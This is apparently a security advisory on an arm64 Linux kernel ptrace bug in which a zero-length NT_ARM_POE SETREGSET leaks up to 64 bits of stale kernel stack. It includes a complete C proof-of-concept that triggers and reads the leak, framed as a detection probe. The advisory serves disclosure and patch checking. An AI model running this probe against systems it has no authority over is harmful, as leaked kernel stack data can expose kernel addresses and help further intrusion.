Linux Kernel Ptrace Vulnerability in NT_ARM_POE Regset Handling

Vulnerability

A vulnerability in the Linux kernel's ptrace implementation for the arm64 architecture has been addressed. In the NT_ARM_POE regset handling, the temporary variable that receives the user-supplied register value was not initialised before the copy from userspace. A SETREGSET request with a length of zero therefore copied nothing into that variable but still wrote it back to the target's thread.por_el0, so up to 64 bits of stale kernel stack content could land in POR_EL0 and be read back with a later GETREGSET. The exposure is limited to the contents of one stack slot; the bug gives no way to write into the kernel stack. The fix initialises the temporary variable with the current thread.por_el0 before copying the regset from userspace, as the other regsets already do. As a result, a zero-length write now leaves the existing POR_EL0 value unchanged.

Impact

A process that is allowed to ptrace a target, for example a parent tracing a child it forked, can read up to 64 bits of stale kernel stack memory per zero-length SETREGSET request. Kernel stack contents may include kernel addresses or other sensitive data, so this is an information leak from the kernel to userspace. The bug does not by itself allow kernel memory to be modified.

Reproduction

The vulnerability can be reproduced on an affected arm64 kernel by writing a known value to NT_ARM_POE (por_el0) with PTRACE_SETREGSET and confirming it with PTRACE_GETREGSET. A further PTRACE_SETREGSET for NT_ARM_POE with an iov_len of 0 then stores an uninitialised value from the kernel stack into por_el0, and a following PTRACE_GETREGSET returns that value instead of the one written earlier.
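The sequence above as a self-contained ptrace program. This is an added example written for this page, not code from the kernel or its selftests. It forks a tracee, stops it, and performs the marker write, the zero-length SETREGSET and the read-back, then reports whether POR_EL0 retained the marker. Assumptions: the NT_ARM_POE fallback value 0x40f is taken from the kernel's uapi elf.h for systems whose headers lack it; the marker 0x7777777777777777 is a constructed value (every 4-bit overlay field set to read/write/execute, so it is a valid encoding); the probe only observes the leak on arm64 hardware with FEAT_S1POE and a kernel built with permission-overlay support, and otherwise reports the regset as unsupported.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fallback for older userspace headers; the value is the one from the
 * kernel's uapi <linux/elf.h>. */
#ifndef NT_ARM_POE
#define NT_ARM_POE 0x40f
#endif

/* Constructed marker: every 4-bit POR_EL0 field is 0x7 (R, W and X), so the
 * value is a valid register encoding and unlikely to match stale stack data. */
#define POE_MARKER 0x7777777777777777ULL

enum poe_probe_result {
    POE_PROBE_ERROR = -2,       /* fork, waitpid or an unexpected ptrace failure */
    POE_PROBE_UNSUPPORTED = -1, /* kernel or CPU has no NT_ARM_POE (EINVAL) */
    POE_PROBE_RETAINED = 0,     /* zero-length write kept POR_EL0: fixed kernel */
    POE_PROBE_LEAKED = 1,       /* zero-length write replaced POR_EL0: affected kernel */
};

/* One NT_ARM_POE regset request against a stopped tracee; 0 or -errno. */
static int poe_regset(pid_t pid, int req, uint64_t *buf, size_t len)
{
    struct iovec iov = { .iov_base = buf, .iov_len = len };

    if (ptrace(req, pid, (void *)(uintptr_t)NT_ARM_POE, &iov) == -1)
        return -errno;
    return 0;
}

/* Run the three-step sequence from the Reproduction section. If 'leaked' is
 * non-NULL it receives the value read back after the zero-length write. */
int probe_poe_zero_length_setregset(uint64_t *leaked)
{
    int status, rc, result = POE_PROBE_ERROR;
    uint64_t val;
    pid_t pid = fork();

    if (pid < 0)
        return POE_PROBE_ERROR;
    if (pid == 0) {
        /* Tracee: opt in to tracing by the parent and stop immediately. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(127);
        raise(SIGSTOP);
        _exit(0);
    }
    if (waitpid(pid, &status, 0) != pid)
        return POE_PROBE_ERROR;
    if (!WIFSTOPPED(status))   /* child exited before stopping, e.g. TRACEME refused */
        return POE_PROBE_ERROR;

    /* Step 1: write the marker and confirm it with a read. */
    val = POE_MARKER;
    rc = poe_regset(pid, PTRACE_SETREGSET, &val, sizeof val);
    if (rc == -EINVAL) {
        result = POE_PROBE_UNSUPPORTED;
        goto out;
    }
    if (rc || poe_regset(pid, PTRACE_GETREGSET, &val, sizeof val) || val != POE_MARKER)
        goto out;

    /* Step 2: zero-length SETREGSET. An affected kernel copies nothing from
     * userspace but still stores its uninitialised temporary into por_el0. */
    val = 0;
    if (poe_regset(pid, PTRACE_SETREGSET, &val, 0))
        goto out;

    /* Step 3: read back. A fixed kernel still returns the marker. */
    if (poe_regset(pid, PTRACE_GETREGSET, &val, sizeof val))
        goto out;
    if (leaked)
        *leaked = val;
    result = (val == POE_MARKER) ? POE_PROBE_RETAINED : POE_PROBE_LEAKED;

out:
    kill(pid, SIGKILL);          /* never resume the tracee with a modified POR_EL0 */
    waitpid(pid, &status, 0);
    return result;
}

int main(void)
{
    uint64_t leaked = 0;
    int r = probe_poe_zero_length_setregset(&leaked);

    switch (r) {
    case POE_PROBE_LEAKED:
        printf("affected: zero-length SETREGSET returned 0x%016llx\n",
               (unsigned long long)leaked);
        break;
    case POE_PROBE_RETAINED:
        printf("not affected: POR_EL0 retained 0x%016llx\n",
               (unsigned long long)leaked);
        break;
    case POE_PROBE_UNSUPPORTED:
        puts("NT_ARM_POE not supported on this kernel/CPU");
        break;
    default:
        fputs("ptrace probe failed (fork, wait or ptrace error)\n", stderr);
    }
    return r < 0 ? 2 : r;
}
```

The tracee is killed rather than resumed so that a modified or leaked POR_EL0 value is never used by running code. On a machine without permission-overlay support the first SETREGSET fails with EINVAL and the probe reports the regset as unsupported, which is the expected result on non-arm64 hosts.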

Remediation

Upgrade to a Linux kernel release that contains the fix, which initialises the temporary value from the current POR_EL0 before the copy from userspace. The affected code only runs on arm64 systems whose CPU implements permission overlays (FEAT_S1POE) and whose kernel is built with that support; elsewhere NT_ARM_POE requests fail with EINVAL and the leak cannot be triggered.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread          9.0
impact          0.6
exploitability  4.3
remediation     0.0
relevance       0.0
threat          4.8
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.